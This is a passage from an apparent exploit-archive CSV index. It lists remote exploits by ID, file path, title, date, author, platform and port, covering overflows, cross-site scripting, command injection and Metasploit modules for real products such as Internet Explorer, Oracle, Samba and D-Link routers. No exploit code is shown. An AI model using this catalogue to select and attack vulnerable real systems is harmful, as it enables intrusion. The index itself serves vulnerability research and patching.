Enumeration",2009-06-03,"D. Matscheko",multiple,remote, -33024,exploits/windows/remote/33024.txt,"Microsoft Internet Explorer 5.0.1 - Cached Content Cross Domain Information Disclosure",2009-06-09,"Jorge Luis Alvarez Medina",windows,remote, -33025,exploits/windows/remote/33025.txt,"LogMeIn 4.0.784 - 'cfgadvanced.html' HTTP Header Injection",2009-06-05,Inferno,windows,remote, -33027,exploits/windows/remote/33027.py,"Kolibri Web Server 2.0 - GET Stack Buffer Overflow",2014-04-25,Polunchis,windows,remote,80 -33032,exploits/linux/remote/33032.txt,"Compress::Raw::Zlib Perl Module - Remote Code Execution",2009-05-11,"Leo Bergolth",linux,remote, -33033,exploits/multiple/remote/33033.html,"WebKit - JavaScript 'onload()' Event Cross Domain Scripting",2009-05-08,"Michal Zalewski",multiple,remote, -33034,exploits/linux/remote/33034.txt,"WebKit - XML External Entity Information Disclosure",2009-05-08,"Chris Evans",linux,remote, -33035,exploits/windows/remote/33035.txt,"Microsoft Windows Media Player 11 - ScriptCommand Multiple Information Disclosure Vulnerabilities",2009-05-12,"Rosario Valotta",windows,remote, -33039,exploits/linux/remote/33039.txt,"Mozilla Firefox 3.0.10 / SeaMonkey 1.1.16 - Address Bar URI Spoofing",2009-05-11,"Pavel Cvrcek",linux,remote, -33044,exploits/hardware/remote/33044.html,"Apple iPhone 2.2.1 - Call Approval Dialog Security Bypass (1)",2009-05-17,"Collin Mulliner",hardware,remote, -33045,exploits/hardware/remote/33045.html,"Apple iPhone 2.2.1 - Call Approval Dialog Security Bypass (2)",2009-05-17,"Collin Mulliner",hardware,remote, -33046,exploits/hardware/remote/33046.html,"Apple iPhone 2.2.1 - Call Approval Dialog Security Bypass (3)",2009-05-17,"Collin Mulliner",hardware,remote, -33047,exploits/multiple/remote/33047.html,"WebKit - 'parent/top' Cross Domain Scripting",2009-05-19,"Gareth Hayes",multiple,remote, -33050,exploits/windows/remote/33050.html,"Microsoft Internet Explorer 7/8 - HTML Attribute JavaScript URI SecURIty Bypass",2009-05-22,80vul,windows,remote, -33051,exploits/cgi/remote/33051.txt,"Nagios 3.0.6 - 'statuswml.cgi' Arbitrary Shell Command Injection",2009-05-22,Paul,cgi,remote, -33053,exploits/linux/remote/33053.txt,"Samba 3.3.5 - Format String / Security Bypass",2009-05-19,"Jeremy Allison",linux,remote, -33054,exploits/hardware/remote/33054.txt,"Cisco Adaptive Security Appliance 8.x - Web VPN FTP or CIFS Authentication Form Phishing",2009-05-24,"David Byrne",hardware,remote, -33055,exploits/hardware/remote/33055.html,"Cisco ASA Appliance 8.x - WebVPN DOM Wrapper Cross-Site Scripting",2009-05-24,"Trustwave's SpiderLabs",hardware,remote, -33063,exploits/windows/remote/33063.txt,"Microsoft Internet Explorer 6 - 'JavaScript:' URI in 'Refresh' Header Cross-Site Scripting",2009-06-03,MustLive,windows,remote, -33064,exploits/multiple/remote/33064.txt,"Google Chrome 0.3.154 - 'JavaScript:' URI in 'Refresh' Header Cross-Site Scripting",2009-06-03,MustLive,multiple,remote, -33066,exploits/windows/remote/33066.html,"Avax Vector 1.3 - 'avPreview.ocx' ActiveX Control Buffer Overflow",2009-06-06,Satan_HackerS,windows,remote, -33067,exploits/multiple/remote/33067.txt,"Winds3D Viewer 3 - 'GetURL()' Arbitrary File Download",2009-06-08,"Diego Juarez",multiple,remote, -33071,exploits/windows/remote/33071.txt,"McAfee ePolicy Orchestrator 4.6.0 < 4.6.5 - 'ePowner' Multiple Vulnerabilities",2014-04-28,st3n,windows,remote, -33078,exploits/multiple/remote/33078.txt,"HP ProCurve Threat Management Services - zl ST.1.0.090213 Module CRL Security Bypass",2009-06-13,anonymous,multiple,remote, -33079,exploits/multiple/remote/33079.txt,"Oracle WebLogic Server 10.3 - 'console-help.portal' Cross-Site Scripting",2009-06-14,"Alexandr Polyakov",multiple,remote, -33081,exploits/multiple/remote/33081.cpp,"Oracle 9i/10g Database - Remote Network Authentication",2009-06-14,"Dennis Yurichev",multiple,remote, -33082,exploits/multiple/remote/33082.txt,"Oracle 10g Secure Enterprise Search - 'search_p_groups' Cross-Site Scripting",2009-06-14,"Alexandr Polyakov",multiple,remote, -33084,exploits/multiple/remote/33084.txt,"Oracle 9i/10g Database - Network Foundation Remote Overflow",2009-06-14,"Dennis Yurichev",multiple,remote, -33089,exploits/windows/remote/33089.pl,"iDefense COMRaider - ActiveX Control Multiple Insecure Method Vulnerabilities",2009-06-17,"Khashayar Fereidani",windows,remote, -33351,exploits/novell/remote/33351.pl,"Novell eDirectory 8.8 - '/dhost/modules?I:' Remote Buffer Overflow",2009-11-12,HACKATTACK,novell,remote, -33580,exploits/hardware/remote/33580.txt,"COMTREND CT-507 IT ADSL Router - 'scvrtsrv.cmd' Cross-Site Scripting",2010-01-29,Yoyahack,hardware,remote, -33095,exploits/windows/remote/33095.rb,"Adobe Flash Player - Type Confusion Remote Code Execution (Metasploit)",2014-04-29,Metasploit,windows,remote, -33103,exploits/linux/remote/33103.html,"Mozilla Firefox 3.5.1 - Error Page Address Bar URI Spoofing",2009-06-24,"Juan Pablo Lopez Yacubian",linux,remote, -33118,exploits/multiple/remote/33118.html,"Apple Safari 4.0.1 - Error Page Address Bar URI Spoofing",2009-06-27,"Juan Pablo Lopez Yacubian",multiple,remote, -33123,exploits/multiple/remote/33123.html,"Google Chrome 2.0.172 - 'About:blank' Address Bar URI Spoofing 'About:blank' Address Bar URI Spoofing",2009-06-28,Lostmon,multiple,remote, -33124,exploits/multiple/remote/33124.txt,"Google Chrome 2.0.172 - 'chrome://history/' URI Cross-Site Scripting",2009-06-28,"Karn Ganeshen",multiple,remote, -33142,exploits/multiple/remote/33142.rb,"Apache Struts - ClassLoader Manipulation Remote Code Execution (Metasploit)",2014-05-02,Metasploit,multiple,remote,8080 -33143,exploits/hardware/remote/33143.rb,"F5 BIG-IQ 4.1.0.2013.0 - Privilege Escalation (Metasploit)",2014-05-02,"Brandon Perry",hardware,remote,443 -33162,exploits/php/remote/33162.php,"PHP 5.2.10/5.3 - 'ini_restore()' Memory Information Disclosure (1)",2009-08-10,"Maksymilian Arciemowicz",php,remote, -33163,exploits/php/remote/33163.php,"PHP 5.2.10/5.3 - 'ini_restore()' Memory Information Disclosure (2)",2009-08-10,"Maksymilian Arciemowicz",php,remote, -33164,exploits/multiple/remote/33164.txt,"WebKit - Floating Point Number Remote Buffer Overflow",2009-08-11,Apple,multiple,remote, -33165,exploits/hardware/remote/33165.txt,"2WIRE Routers - 'CD35_SETUP_01' Access Validation",2009-08-12,hkm,hardware,remote, -33172,exploits/windows/remote/33172.txt,"Valve Software Source Engine - Format String",2009-08-17,"Luigi Auriemma",windows,remote, -33177,exploits/hardware/remote/33177.txt,"NETGEAR WNR2000 - Multiple Information Disclosure Vulnerabilities",2009-08-18,"Jean Trolleur",hardware,remote, -33192,exploits/multiple/remote/33192.php,"Google Chrome 6.0.472 - 'Math.Random()' Random Number Generation",2009-08-31,"Amit Klein",multiple,remote, -33203,exploits/multiple/remote/33203.txt,"GreenSQL Firewall 0.9.x - WHERE Clause Security Bypass",2009-09-02,"Johannes Dahse",multiple,remote, -33207,exploits/windows/remote/33207.txt,"SmartVMD 1.3 - ActiveX Control 'VideoMovementDetection.dll' Remote Buffer Overflow",2009-09-01,"optix hacker",windows,remote, -33210,exploits/multiple/remote/33210.txt,"HP Operations Manager - Default Manager 8.1 Account Remote Security",2009-09-03,Intevydis,multiple,remote, -33211,exploits/multiple/remote/33211.txt,"HP Operations Dashboard 2.1 - Portal Default Manager Account Remote Security",2009-09-03,Intevydis,multiple,remote, -33212,exploits/windows/remote/33212.rb,"Adobe Flash Player - Integer Underflow Remote Code Execution (Metasploit)",2014-05-06,Metasploit,windows,remote, -33215,exploits/multiple/remote/33215.txt,"IBM Tivoli Identity Manager 5.0.5 - User Profile HTML Injection",2009-08-26,IBM,multiple,remote, -33234,exploits/hardware/remote/33234.txt,"Check Point Connectra R62 - '/Login/Login' Arbitrary Script Injection",2009-09-21,"Stefan Friedli",hardware,remote, -33257,exploits/hardware/remote/33257.txt,"Juniper Junos 8.5/9.0 J - Web Interface 'PATH_INFO' Cross-Site Scripting",2009-09-22,"Amir Azam",hardware,remote, -33258,exploits/hardware/remote/33258.txt,"Juniper Junos 8.5/9.0 J-Web Interface - '/diagnose' Multiple Cross-Site Scripting Vulnerabilities",2009-09-22,"Amir Azam",hardware,remote, -33259,exploits/hardware/remote/33259.txt,"Juniper Junos 8.5/9.0 J-Web Interface - '/configuration' Multiple Cross-Site Scripting Vulnerabilities",2009-09-22,"Amir Azam",hardware,remote, -33260,exploits/hardware/remote/33260.txt,"Juniper Junos 8.5/9.0 J-Web Interface - 'scripter.php' Multiple Cross-Site Scripting Vulnerabilities",2009-09-22,"Amir Azam",hardware,remote, -33261,exploits/hardware/remote/33261.txt,"Juniper Junos 8.5/9.0 J - Web Interface (Multiple Script) 'm[]' Cross-Site Scripting",2009-09-22,"Amir Azam",hardware,remote, -33263,exploits/windows/remote/33263.html,"EMC Captiva PixTools 2.2 Distributed Imaging - ActiveX Control Multiple Insecure Method Vulnerabilities",2009-10-01,"Giuseppe Fuggiano",windows,remote, -33265,exploits/hardware/remote/33265.js,"Palm WebOS 1.0/1.1 - Email Arbitrary Script Injection",2009-10-05,"Townsend Ladd Harris",hardware,remote, -33270,exploits/windows/remote/33270.txt,"Microsoft Internet Explorer 5.0.1 - 'deflate' HTTP Content Encoding Remote Code Execution",2009-10-13,Skylined,windows,remote, -33272,exploits/windows/remote/33272.txt,"Autodesk 3ds - Max Application Callbacks Arbitrary Command Execution",2009-10-23,"Sebastian Tello",windows,remote, -33264,exploits/windows/remote/33264.txt,"Microsoft Internet Explorer 8 - X.509 Certificate Common Name Encoding Multiple Security Bypass Vulnerabilities",2009-08-05,"Dan Kaminsky",windows,remote, -33273,exploits/windows/remote/33273.scn,"Autodesk SoftImage 7.0 Scene - '.TOC' File Remote Code Execution",2009-11-23,"Diego Juarez",windows,remote, -33645,exploits/windows/remote/33645.py,"httpdx 1.5 - 'MKD' Directory Traversal",2010-02-15,fb1h2s,windows,remote, -33310,exploits/multiple/remote/33310.nse,"VMware Server 2.0.1 / ESXi Server 3.5 - Directory Traversal",2009-10-27,"Justin Morehouse",multiple,remote, -33311,exploits/linux/remote/33311.txt,"KDE 4.3.2 - Multiple Input Validation Vulnerabilities",2009-10-27,"Tim Brown",linux,remote, -33313,exploits/linux/remote/33313.txt,"Mozilla Firefox 3.5.3 / SeaMonkey 1.1.17 - 'libpr0n' .GIF Parser Heap Based Buffer Overflow",2009-10-27,regenrecht,linux,remote, -33315,exploits/linux/remote/33315.java,"Sun Java SE November 2009 - Multiple Vulnerabilities (1)",2009-10-29,Tometzky,linux,remote, -33316,exploits/multiple/remote/33316.java,"Sun Java SE November 2009 - Multiple Vulnerabilities (2)",2009-10-29,Tometzky,multiple,remote, -33594,exploits/windows/remote/33594.txt,"Microsoft Windows Vista/2008 - ICMPv6 Router Advertisement Remote Code Execution",2010-02-09,"Sumit Gwalani",windows,remote, -33326,exploits/windows/remote/33326.py,"EFS Easy Chat Server 3.1 - Remote Stack Buffer Overflow",2014-05-12,superkojiman,windows,remote, -33331,exploits/windows/remote/33331.rb,"Yokogawa CS3000 - 'BKESimmgr.exe' Remote Buffer Overflow (Metasploit)",2014-05-12,Metasploit,windows,remote,34205 -33333,exploits/windows/remote/33333.rb,"Adobe Flash Player - Shader Buffer Overflow (Metasploit)",2014-05-12,Metasploit,windows,remote, -33363,exploits/multiple/remote/33363.txt,"Opera Web Browser 10.01 - 'dtoa()' Remote Code Execution",2009-11-20,"Maksymilian Arciemowicz",multiple,remote, -33364,exploits/linux/remote/33364.txt,"KDE 4.3.3 - KDELibs 'dtoa()' Remote Code Execution",2009-11-20,"Maksymilian Arciemowicz",linux,remote, -33379,exploits/multiple/remote/33379.txt,"Apache Tomcat 3.2 - 404 Error Page Cross-Site Scripting",2009-09-02,MustLive,multiple,remote, -33388,exploits/linux/remote/33388.f,"Xfig and Transfig 3.2.5 - '.fig' Remote Buffer Overflow",2009-12-03,pedamachephepto,linux,remote, -33399,exploits/multiple/remote/33399.txt,"Oracle E-Business Suite 11i - Multiple Remote Vulnerabilities",2009-12-14,Hacktics,multiple,remote, -41805,exploits/hardware/remote/41805.txt,"Broadcom Wi-Fi SoC - TDLS Teardown Request Remote Heap Overflow",2017-04-04,"Google Security Research",hardware,remote, -33453,exploits/windows/remote/33453.py,"Easy File Management Web Server 5.3 - Remote Stack Buffer Overflow",2014-05-21,superkojiman,windows,remote, -33454,exploits/windows/remote/33454.py,"Easy Address Book Web Server 1.6 - Remote Stack Buffer Overflow",2014-05-21,superkojiman,windows,remote, -33471,exploits/hardware/remote/33471.txt,"D-Link DKVM-IP8 - 'auth.asp' Cross-Site Scripting",2010-01-06,POPCORN,hardware,remote, -40344,exploits/php/remote/40344.rb,"SugarCRM 6.5.23 - REST PHP Object Injection (Metasploit)",2016-09-07,"Egidio Romano",php,remote,80 -33489,exploits/multiple/remote/33489.txt,"Ruby 1.9.1 - WEBrick 'Terminal Escape Sequence in Logs' Command Injection",2010-01-11,evilaliv3,multiple,remote, -33490,exploits/multiple/remote/33490.txt,"Nginx 0.7.64 - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote, -33497,exploits/multiple/remote/33497.txt,"AOLServer Terminal 4.5.1 - Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote, -33498,exploits/multiple/remote/33498.txt,"Varnish 2.0.6 - 'Terminal Escape Sequence in Logs' Command Injection",2010-01-11,evilaliv3,multiple,remote, -33499,exploits/multiple/remote/33499.txt,"thttpd 2.24 - HTTP Request Escape Sequence Terminal Command Injection",2010-01-11,evilaliv3,multiple,remote, -33500,exploits/multiple/remote/33500.txt,"mini_httpd 1.18 - HTTP Request Escape Sequence Terminal Command Injection",2010-01-11,evilaliv3,multiple,remote, -33501,exploits/windows/remote/33501.txt,"Cherokee 0.99.30 - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,windows,remote, -33502,exploits/windows/remote/33502.txt,"Yaws 1.55 - 'Logs' Terminal Escape Sequence Command Injection",2010-01-11,evilaliv3,windows,remote, -33503,exploits/multiple/remote/33503.txt,"Orion Application Server 2.0.7 - 'Terminal Escape Sequence in Logs' Command Injection",2010-01-11,evilaliv3,multiple,remote, -33504,exploits/multiple/remote/33504.txt,"BOA Web Server 0.94.x - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote, -33521,exploits/multiple/remote/33521.rb,"Symantec Workspace Streaming - Arbitrary File Upload (Metasploit)",2014-05-26,Metasploit,multiple,remote,9855 -33611,exploits/windows/remote/33611.txt,"GeFest Web Home Server 1.0 - Directory Traversal",2010-02-08,Markot,windows,remote, -33525,exploits/php/remote/33525.txt,"Zend Framework 1.9.6 - Multiple Input Validation Vulnerabilities / Security Bypass",2010-01-14,"draic Brady",php,remote, -33535,exploits/linux/remote/33535.txt,"SystemTap 1.0 - 'stat-server' Arbitrary Command Injection",2010-01-15,"Frank Ch. Eigler",linux,remote, -33536,exploits/multiple/remote/33536.txt,"Zenoss 2.3.3 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-01-18,"Adam Baldwin",multiple,remote, -33538,exploits/windows/remote/33538.py,"Easy File Sharing FTP Server 3.5 - Remote Stack Buffer Overflow",2014-05-27,superkojiman,windows,remote,21 -33540,exploits/windows/remote/33540.txt,"SurgeFTP 2.x - 'surgeftpmgr.cgi' Multiple Cross-Site Scripting Vulnerabilities",2010-01-18,indoushka,windows,remote, -33552,exploits/windows/remote/33552.txt,"Microsoft Internet Explorer 8 - URI Validation Remote Code Execution",2010-01-21,"Lostmon Lords",windows,remote, -33553,exploits/multiple/remote/33553.txt,"Sun Java System Web Server 6.1/7.0 - Digest Authentication Remote Buffer Overflow",2010-01-21,Intevydis,multiple,remote, -33554,exploits/linux/remote/33554.py,"TORQUE Resource Manager 2.5.x < 2.5.13 - Stack Based Buffer Overflow Stub",2014-05-28,bwall,linux,remote, -33562,exploits/multiple/remote/33562.html,"Google Chrome 3.0 - Style Sheet redirection Information Disclosure",2010-01-22,"Cesar Cerrudo",multiple,remote, -33563,exploits/windows/remote/33563.txt,"Apple Safari 4.0.4 - Style Sheet redirection Information Disclosure",2010-01-09,"Cesar Cerrudo",windows,remote, -33567,exploits/hardware/remote/33567.txt,"Cisco Secure Desktop 3.x - 'translation' Cross-Site Scripting",2010-01-26,"Matias Pablo Brutti",hardware,remote, -33568,exploits/hardware/remote/33568.txt,"Novatel Wireless MiFi 2352 - Password Information Disclosure",2010-01-17,"Alejandro Ramos",hardware,remote, -33569,exploits/multiple/remote/33569.txt,"HP System Management Homepage 3.0.2 - 'servercert' Cross-Site Scripting",2010-01-27,"Richard Brain",multiple,remote, -33570,exploits/multiple/remote/33570.txt,"SAP BusinessObjects 12 - URI redirection / Cross-Site Scripting",2010-01-27,"Richard Brain",multiple,remote, -33588,exploits/java/remote/33588.rb,"ElasticSearch Dynamic Script - Arbitrary Java Execution (Metasploit)",2014-05-30,Metasploit,java,remote,9200 -33598,exploits/linux/remote/33598.rb,"Samba 3.4.5 - Symlink Directory Traversal (Metasploit)",2010-02-04,kingcope,linux,remote, -33599,exploits/linux/remote/33599.txt,"Samba 3.4.5 - Symlink Directory Traversal",2010-02-04,kingcope,linux,remote, -33600,exploits/multiple/remote/33600.rb,"Oracle 10g - Multiple Privilege Escalation Vulnerabilities",2010-02-05,"David Litchfield",multiple,remote, -33601,exploits/multiple/remote/33601.rb,"Oracle 11g - Multiple Privilege Escalation Vulnerabilities",2010-02-05,"David Litchfield",multiple,remote, -33610,exploits/windows/remote/33610.py,"Easy File Management Web Server 5.3 - 'UserID' Remote Buffer Overflow (ROP)",2014-06-01,"Julien Ahrens",windows,remote,80 -33615,exploits/multiple/remote/33615.txt,"JDownloader - 'JDExternInterface.java' Remote Code Execution",2010-02-08,apoc,multiple,remote, -33616,exploits/multiple/remote/33616.txt,"Mongoose 2.8 - Space String Remote File Disclosure",2010-02-08,"Pouya Daneshmand",multiple,remote, -33620,exploits/linux/remote/33620.txt,"Helix Player 11.0.2 - Encoded URI Processing Buffer Overflow",2007-07-03,gwright,linux,remote, -33622,exploits/linux/remote/33622.txt,"Accellion File Transfer - 'Appliance web_client_user_guide.html?lang' Traversal Arbitrary File Access",2010-02-10,"Tim Brown",linux,remote, -33642,exploits/windows/remote/33642.html,"Symantec (Multiple Products) - Client Proxy ActiveX 'CLIproxy.dll' Remote Overflow",2010-02-17,"Alexander Polyakov",windows,remote, -33648,exploits/hardware/remote/33648.txt,"Huawei HG510 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-02-16,"Ivan Markovic",hardware,remote, -33653,exploits/multiple/remote/33653.txt,"PortWise SSL VPN 4.6 - 'reloadFrame' Cross-Site Scripting",2010-02-18,"George Christopoulos",multiple,remote, -33662,exploits/windows/remote/33662.txt,"WampServer 2.0i - 'lang' Cross-Site Scripting",2010-02-22,"Gjoko Krstic",windows,remote, -33663,exploits/multiple/remote/33663.txt,"IBM Websphere Portal 6.0.1.5 Build wp6015 - Portlet Palette Search HTML Injection",2010-02-19,"Sjoerd Resink",multiple,remote, -33664,exploits/multiple/remote/33664.html,"Mozilla Firefox 3.5.8 - Style Sheet redirection Information Disclosure",2010-01-09,"Cesar Cerrudo",multiple,remote, -33682,exploits/multiple/remote/33682.txt,"Oracle Siebel 7.7/7.8 - '/loyalty_enu/start.swe' Cross-Site Scripting",2010-03-01,Lament,multiple,remote, -33686,exploits/multiple/remote/33686.txt,"IBM Lotus Domino 7.0.2 - 'readme.nsf' Cross-Site Scripting",2010-03-02,"Nahuel Grisolia",multiple,remote, -33689,exploits/multiple/remote/33689.as,"Adobe Flash Player 10.1.51 - Local File Access Information Disclosure",2010-03-03,"lis cker",multiple,remote, -33705,exploits/windows/remote/33705.txt,"Authentium Command On Demand ActiveX Control - Multiple Buffer Overflow Vulnerabilities",2010-03-04,"Nikolas Sotiriu",windows,remote, -33712,exploits/windows/remote/33712.txt,"VideoLAN VLC Media Player 1.0.x - Bookmark Creation Buffer Overflow",2010-03-05,"Gjoko Krstic",windows,remote, -33739,exploits/hardware/remote/33739.txt,"Yealink VoIP Phone SIP-T38G - Default Credentials",2014-06-13,Mr.Un1k0d3r,hardware,remote, -33741,exploits/hardware/remote/33741.txt,"Yealink VoIP Phone SIP-T38G - Remote Command Execution",2014-06-13,Mr.Un1k0d3r,hardware,remote, -33742,exploits/hardware/remote/33742.txt,"Yealink VoIP Phone SIP-T38G - Privilege Escalation",2014-06-13,Mr.Un1k0d3r,hardware,remote, -33750,exploits/windows/remote/33750.txt,"Microsoft Windows XP/2000 - Help File Relative Path Remote Command Execution",2010-03-06,Secumania,windows,remote, -33752,exploits/linux/remote/33752.html,"WebKit 1.2.x - Right-to-Left Displayed Text Handling Memory Corruption",2010-03-11,wushi,linux,remote, -33767,exploits/novell/remote/33767.rb,"Novell eDirectory 8.8.5 - DHost Weak Session Cookie Session Hijacking (Metasploit)",2010-03-14,Metasploit,novell,remote, -33774,exploits/multiple/remote/33774.txt,"IBM Lotus Notes 6.5.6 - 'names.nsf' Open Redirection",2010-03-19,Lament,multiple,remote, -33780,exploits/multiple/remote/33780.txt,"IBM Lotus Notes 6.5.x - 'names.nsf' Cross-Site Scripting",2010-03-19,Lament,multiple,remote, -33783,exploits/linux/remote/33783.txt,"Astaro Security Linux 5 - 'index.fpl' Cross-Site Scripting",2010-03-23,"Vincent Hautot",linux,remote, -33786,exploits/multiple/remote/33786.txt,"Cafu 9.06 - Multiple Remote Vulnerabilities",2010-03-23,"Luigi Auriemma",multiple,remote, -33789,exploits/multiple/remote/33789.rb,"Java - Debug Wire Protocol Remote Code Execution (Metasploit)",2014-06-17,Metasploit,multiple,remote,8000 -33790,exploits/windows/remote/33790.rb,"Easy File Management Web Server - Remote Stack Buffer Overflow (Metasploit)",2014-06-17,Metasploit,windows,remote,80 -33798,exploits/linux/remote/33798.html,"Mozilla Firefox 3.6 - Image Preloading Content-Policy Check Security Bypass",2010-03-18,"Josh Soref",linux,remote, -33802,exploits/multiple/remote/33802.txt,"Jenkins Software RakNet 3.72 - Remote Integer Underflow",2010-03-25,"Luigi Auriemma",multiple,remote, -33805,exploits/linux/remote/33805.pl,"Alienvault Open Source SIEM (OSSIM) < 4.7.0 - av-centerd 'get_log_line()' Remote Code Execution",2014-06-18,"Alfredo Ramirez",linux,remote, -33807,exploits/multiple/remote/33807.rb,"Rocket Servergraph Admin Center - fileRequestor Remote Code Execution (Metasploit)",2014-06-18,Metasploit,multiple,remote,8888 -33810,exploits/osx/remote/33810.html,"Apple Safari for iPhone/iPod touch - 'Throw' Exception Remote Code Execution",2010-03-26,"Nishant Das Patnaik",osx,remote, -33811,exploits/osx/remote/33811.html,"Apple Safari iPhone/iPod touch - Webpage Remote Code Execution",2010-03-26,"Nishant Das Patnaik",osx,remote, -33816,exploits/multiple/remote/33816.pl,"Miranda IM 0.8.16 - Information Disclosure",2010-04-06,"Jan Schejbal",multiple,remote, -33817,exploits/windows/remote/33817.rb,"Ericom AccessNow Server - Remote Buffer Overflow (Metasploit)",2014-06-19,Metasploit,windows,remote,8080 -33852,exploits/windows/remote/33852.txt,"HTTP 1.1 - GET Directory Traversal",2010-06-20,chr1x,windows,remote, -33826,exploits/linux/remote/33826.txt,"TCPDF 4.5.036/4.9.5 - 'params' Attribute Remote Code Execution",2010-04-08,apoc,linux,remote, -33829,exploits/windows/remote/33829.c,"WinSoftMagic Photo Editor - '.png' Remote Buffer Overflow",2010-04-09,eidelweiss,windows,remote, -33839,exploits/multiple/remote/33839.txt,"Oracle E-Business Suite Financials 12 - 'jtfwcpnt.jsp' SQL Injection",2010-04-15,"Joxean Koret",multiple,remote, -33841,exploits/windows/remote/33841.txt,"HTTP File Server 2.2 - Security Bypass / Denial of Service",2010-04-19,"Luigi Auriemma",windows,remote, -33880,exploits/windows/remote/33880.rb,"Cogent DataHub - Command Injection (Metasploit)",2014-06-25,Metasploit,windows,remote, -33847,exploits/multiple/remote/33847.txt,"netkar-PRO 1.1 - Remote Stack Buffer Overflow",2010-04-13,"Luigi Auriemma",multiple,remote, -33848,exploits/windows/remote/33848.py,"WinMount 3.3.401 - '.zip' Remote Buffer Overflow",2010-04-19,lilf,windows,remote, -33868,exploits/multiple/remote/33868.txt,"Apache ActiveMQ 5.2/5.3 - Source Code Information Disclosure",2010-04-22,"Veerendra G.G",multiple,remote, -33855,exploits/linux/remote/33855.txt,"MIT Kerberos 5 - 'src/kdc/do_tgs_req.c' Ticket Renewal Double-Free Memory Corruption",2010-04-20,"Joel Johnson",linux,remote, -34143,exploits/windows/remote/34143.txt,"XnView 1.97.4 - '.MBM' File Remote Heap Buffer Overflow",2010-06-14,"Mauro Olea",windows,remote, -33862,exploits/hardware/remote/33862.rb,"D-Link Devices - 'Authentication.cgi' Remote Buffer Overflow (Metasploit)",2014-06-24,Metasploit,hardware,remote,80 -33863,exploits/hardware/remote/33863.rb,"D-Link Devices - 'hedwig.cgi' Remote Buffer Overflow in Cookie Header (Metasploit)",2014-06-24,Metasploit,hardware,remote,80 -33865,exploits/linux/remote/33865.rb,"Alienvault Open Source SIEM (OSSIM) - av-centerd Command Injection (Metasploit)",2014-06-24,Metasploit,linux,remote,40007 -33869,exploits/hardware/remote/33869.txt,"Huawei EchoLife HG520 3.10.18.5-1.0.5.0 - Remote Information Disclosure",2010-04-22,hkm,hardware,remote, -33871,exploits/multiple/remote/33871.txt,"Tiny Java Web Server 1.71 - Multiple Input Validation Vulnerabilities",2010-04-08,cp77fk4r,multiple,remote, -33873,exploits/multiple/remote/33873.txt,"HP System Management Homepage - 'RedirectUrl' Open Redirection",2010-04-25,"Aung Khant",multiple,remote, -33877,exploits/multiple/remote/33877.c,"NovaSTOR NovaNET 12.0 - Remote Command Execution",2007-09-25,mu-b,multiple,remote, -33878,exploits/multiple/remote/33878.c,"NovaSTOR NovaNET 12.0 - Remote SYSTEM",2007-09-25,mu-b,multiple,remote, -33890,exploits/windows/remote/33890.txt,"OneHTTPD 0.6 - Directory Traversal",2010-04-27,"John Leitch",windows,remote, -33891,exploits/java/remote/33891.rb,"HP AutoPass License Server - Arbitrary File Upload (Metasploit)",2014-06-27,Metasploit,java,remote,5814 -33900,exploits/windows/remote/33900.pl,"Serenity Audio Player 3.2.3 - '.m3u' Remote Buffer Overflow",2010-04-26,Madjix,windows,remote, -33901,exploits/windows/remote/33901.rb,"Serenity Audio Player 3.2.3 - '.m3u' Remote Buffer Overflow (Metasploit)",2010-04-26,blake,windows,remote, -33905,exploits/multiple/remote/33905.txt,"Apache ActiveMQ 5.3 - 'admin/queueBrowse' Cross-Site Scripting",2010-04-28,"arun kethipelly",multiple,remote, -33907,exploits/multiple/remote/33907.txt,"ZKSoftware 'ZK5000' - Remote Information Disclosure",2010-03-20,fb1h2s,multiple,remote, -33962,exploits/hardware/remote/33962.txt,"Cisco Application Control Engine (ACE) - HTTP Parsing Security",2010-05-07,"Alexis Tremblay",hardware,remote, -33964,exploits/windows/remote/33964.txt,"X-Motor Racing 1.26 - Remote Buffer Overflow / Multiple Denial of Service Vulnerabilities",2010-05-06,"Luigi Auriemma",windows,remote, -33971,exploits/windows/remote/33971.c,"Rebellion Aliens vs Predator 2.22 - Multiple Memory Corruption Vulnerabilities",2010-05-07,"Luigi Auriemma",windows,remote, -33920,exploits/php/remote/33920.php,"PHP 5.3 - 'PHP_dechunk()' HTTP Chunked Encoding Integer Overflow",2010-05-02,"Stefan Esser",php,remote, -33988,exploits/php/remote/33988.txt,"PHP 5.3.x < 5.3.2 - 'ext/phar/stream.c' / 'ext/phar/dirstream.c' Multiple Format String Vulnerabilities",2010-05-14,"Stefan Esser",php,remote, -33989,exploits/windows/remote/33989.rb,"Oracle Event Processing FileUploadServlet - Arbitrary File Upload (Metasploit)",2014-07-07,Metasploit,windows,remote,9002 -33929,exploits/multiple/remote/33929.py,"Gitlist 0.4.0 - Remote Code Execution",2014-06-30,drone,multiple,remote, -33935,exploits/windows/remote/33935.txt,"rbot 0.9.14 - '!react' Unauthorized Access",2010-02-24,nks,windows,remote, -33938,exploits/hardware/remote/33938.txt,"Sterlite SAM300 AX Router - 'Stat_Radio' Cross-Site Scripting",2010-02-04,"Karn Ganeshen",hardware,remote, -33940,exploits/multiple/remote/33940.txt,"VMware View 3.1.x - URL Processing Cross-Site Scripting",2010-05-05,"Alexey Sintsov",multiple,remote, -33941,exploits/windows/remote/33941.html,"TVUPlayer 2.4.4.9beta1 - 'PlayerOcx.ocx' ActiveX Control Arbitrary File Overwrite",2010-02-03,"Evdokimov Dmitriy",windows,remote, -33944,exploits/windows/remote/33944.html,"Microsoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP + EMET 4.1.x Bypass) (MS12-037)",2014-07-01,sickness,windows,remote, -33949,exploits/linux/remote/33949.txt,"PCRE 6.2 - Regular Expression Compiling Workspace Buffer Overflow",2010-05-06,"Michael Santos",linux,remote, -33974,exploits/windows/remote/33974.txt,"Mereo 1.9.1 - Directory Traversal",2010-05-09,"John Leitch",windows,remote, -33980,exploits/windows/remote/33980.txt,"Best Way GEM Engine - Multiple Vulnerabilities",2009-10-12,"Luigi Auriemma",windows,remote, -33981,exploits/windows/remote/33981.txt,"GameCore 2.5 - 'GameID' Integer Overflow",2010-05-13,"Luigi Auriemma",windows,remote, -33990,exploits/multiple/remote/33990.rb,"Gitlist - Unauthenticated Remote Command Execution (Metasploit)",2014-07-07,Metasploit,multiple,remote,80 -33991,exploits/php/remote/33991.rb,"WordPress Plugin MailPoet Newsletters 2.6.8 - 'wysija-newsletters' Unauthenticated 